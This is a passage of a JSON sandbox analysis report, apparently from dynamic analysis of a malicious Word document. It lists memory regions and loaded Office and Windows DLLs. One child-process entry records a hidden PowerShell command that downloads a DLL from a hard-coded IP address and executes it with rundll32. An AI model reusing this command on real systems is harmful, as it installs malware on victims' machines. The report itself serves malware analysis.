0, "filename": null, "id": "region_250", "name": "private_0x0000000004d30000", "norm_filename": null, "region_type": "private_memory", "start_va": 80936960, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 81199104, "type": "region", "version": 1 }, "end_va": 85393407, "entry_point": 0, "filename": null, "id": "region_251", "name": "private_0x0000000004d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 81199104, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 85393408, "type": "region", "version": 1 }, "end_va": 87490559, "entry_point": 0, "filename": null, "id": "region_252", "name": "private_0x0000000005170000", "norm_filename": null, "region_type": "private_memory", "start_va": 85393408, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 87490560, "type": "region", "version": 1 }, "end_va": 91684863, "entry_point": 0, "filename": null, "id": "region_253", "name": "private_0x0000000005370000", "norm_filename": null, "region_type": "private_memory", "start_va": 87490560, "timestamp": "00:00:11.675", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 91684864, "type": "region", "version": 1 }, "end_va": 100073471, "entry_point": 0, "filename": null, "id": "region_254", "name": "pagefile_0x0000000005770000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 91684864, "timestamp": "00:00:11.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 100073472, "type": "region", "version": 1 }, "end_va": 104271871, "entry_point": 0, "filename": null, "id": "region_255", "name": "private_0x0000000005f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 100073472, "timestamp": "00:00:11.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 104333312, "type": "region", "version": 1 }, "end_va": 108531711, "entry_point": 0, "filename": null, "id": "region_256", "name": "private_0x0000000006380000", "norm_filename": null, "region_type": "private_memory", "start_va": 104333312, "timestamp": "00:00:11.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 108593152, "type": "region", "version": 1 }, "end_va": 112791551, "entry_point": 0, "filename": null, "id": "region_257", "name": "private_0x0000000006790000", "norm_filename": null, "region_type": "private_memory", "start_va": 108593152, "timestamp": "00:00:11.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 112852992, "type": "region", "version": 1 }, "end_va": 114950143, "entry_point": 0, "filename": null, "id": "region_258", "name": "private_0x0000000006ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 112852992, "timestamp": "00:00:11.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 114950144, "type": "region", "version": 1 }, "end_va": 119930879, "entry_point": 0, "filename": null, "id": "region_259", "name": "private_0x0000000006da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 114950144, "timestamp": "00:00:11.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 119930880, "type": "region", "version": 1 }, "end_va": 124125183, "entry_point": 0, "filename": null, "id": "region_260", "name": "private_0x0000000007260000", "norm_filename": null, "region_type": "private_memory", "start_va": 119930880, "timestamp": "00:00:11.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 124125184, "type": "region", "version": 1 }, "end_va": 132513791, "entry_point": 0, "filename": null, "id": "region_261", "name": "private_0x0000000007660000", "norm_filename": null, "region_type": "private_memory", "start_va": 124125184, "timestamp": "00:00:11.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 914948096, "type": "region", "version": 1 }, "end_va": 915013631, "entry_point": 0, "filename": null, "id": "region_262", "name": "private_0x0000000036890000", "norm_filename": null, "region_type": "private_memory", "start_va": 914948096, "timestamp": "00:00:11.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1671888896, "type": "region", "version": 1 }, "end_va": 1672073215, "entry_point": 1671888896, "filename": "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_263", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1671888896, "timestamp": "00:00:11.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1630208, "start_va": 1672085504, "type": "region", "version": 1 }, "end_va": 1673715711, "entry_point": 1672085504, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL", "id": "region_264", "name": "riched20.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 1672085504, "timestamp": "00:00:11.686", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 741376, "start_va": 1673723904, "type": "region", "version": 1 }, "end_va": 1674465279, "entry_point": 1673723904, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL", "id": "region_265", "name": "adal.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll", "region_type": "memory_mapped_file", "start_va": 1673723904, "timestamp": "00:00:11.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1674510336, "type": "region", "version": 1 }, "end_va": 1675010047, "entry_point": 1674510336, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_266", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1674510336, "timestamp": "00:00:11.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1089536, "start_va": 1675886592, "type": "region", "version": 1 }, "end_va": 1676976127, "entry_point": 1675886592, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_267", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 1675886592, "timestamp": "00:00:11.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 1677000704, "type": "region", "version": 1 }, "end_va": 1678229503, "entry_point": 1677000704, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_268", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 1677000704, "timestamp": "00:00:11.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 80654336, "start_va": 1678245888, "type": "region", "version": 1 }, "end_va": 1758900223, "entry_point": 1678245888, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL", "id": "region_269", "name": "msores.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll", "region_type": "memory_mapped_file", "start_va": 1678245888, "timestamp": "00:00:11.754", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 26099712, "start_va": 1758920704, "type": "region", "version": 1 }, "end_va": 1785020415, "entry_point": 1758920704, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL", "id": "region_270", "name": "mso.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll", "region_type": "memory_mapped_file", "start_va": 1758920704, "timestamp": "00:00:11.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 21741568, "start_va": 1785069568, "type": "region", "version": 1 }, "end_va": 1806811135, "entry_point": 1785069568, "filename": "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL", "id": "region_271", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 1785069568, "timestamp": "00:00:11.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1806893056, "type": "region", "version": 1 }, "end_va": 1807196159, "entry_point": 1806893056, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_272", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1806893056, "timestamp": "00:00:11.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1807220736, "type": "region", "version": 1 }, "end_va": 1807757311, "entry_point": 1807220736, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_273", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 1807220736, "timestamp": "00:00:11.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1138688, "start_va": 1807810560, "type": "region", "version": 1 }, "end_va": 1808949247, "entry_point": 1807810560, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL", "id": "region_274", "name": "msptls.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 1807810560, "timestamp": "00:00:11.830", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3608576, "start_va": 1808990208, "type": "region", "version": 1 }, "end_va": 1812598783, "entry_point": 1808990208, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL", "id": "region_275", "name": "msointl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 1808990208, "timestamp": "00:00:11.841", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 786432, "start_va": 1812660224, "type": "region", "version": 1 }, "end_va": 1813446655, "entry_point": 1812660224, "filename": "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL", "id": "region_276", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 1812660224, "timestamp": "00:00:11.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 761856, "start_va": 1813446656, "type": "region", "version": 1 }, "end_va": 1814208511, "entry_point": 1813446656, "filename": "\\Windows\\System32\\d2d1.dll", "id": "region_277", "name": "d2d1.dll", "norm_filename": "c:\\windows\\system32\\d2d1.dll", "region_type": "memory_mapped_file", "start_va": 1813446656, "timestamp": "00:00:11.854", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14319616, "start_va": 1814233088, "type": "region", "version": 1 }, "end_va": 1828552703, "entry_point": 1814233088, "filename": "\\Program Files\\Microsoft Office\\Office15\\OART.DLL", "id": "region_278", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\oart.dll", "region_type": "memory_mapped_file", "start_va": 1814233088, "timestamp": "00:00:11.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1868234752, "type": "region", "version": 1 }, "end_va": 1868566527, "entry_point": 1868234752, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_279", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1868234752, "timestamp": "00:00:11.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1409024, "start_va": 1873281024, "type": "region", "version": 1 }, "end_va": 1874690047, "entry_point": 1873281024, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_280", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 1873281024, "timestamp": "00:00:11.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5242880, "start_va": 1890320384, "type": "region", "version": 1 }, "end_va": 1895563263, "entry_point": 1890320384, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF", "id": "region_281", "name": "office.odf", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 1890320384, "timestamp": "00:00:11.902", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895563264, "filename": "\\Windows\\System32\\msi.dll", "id": "region_282", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:11.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1898119168, "type": "region", "version": 1 }, "end_va": 1898549247, "entry_point": 1898119168, "filename": "\\Windows\\System32\\msvcp100.dll", "id": "region_283", "name": "msvcp100.dll", "norm_filename": "c:\\windows\\system32\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1898119168, "timestamp": "00:00:11.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 782336, "start_va": 1898577920, "type": "region", "version": 1 }, "end_va": 1899360255, "entry_point": 1898577920, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_284", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1898577920, "timestamp": "00:00:11.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1903099904, "type": "region", "version": 1 }, "end_va": 1903636479, "entry_point": 1903099904, "filename": "\\Windows\\System32\\dxgi.dll", "id": "region_285", "name": "dxgi.dll", "norm_filename": "c:\\windows\\system32\\dxgi.dll", "region_type": "memory_mapped_file", "start_va": 1903099904, "timestamp": "00:00:11.959", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "c:\\Windows\\System32\\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK ", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_2", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000405-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_405", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:20.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_406", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:20.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_407", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:20.627", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000408-addr_0x00000000001d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_408", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:00:20.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239744512, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_409", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:20.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_410", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:20.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_411", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:20.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_412", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:20.637", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000413-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_413", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:20.638", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000414-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_414", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:20.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_415", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:20.685", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_416", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:20.685", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_417", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:20.685", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000418-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_418", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:20.685", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_419", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:20.685", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_420", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:20.686", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_421", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:20.686", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914372096, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_422", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:20.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_423", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:20.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_424", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:20.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_425", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:20.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_426", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": 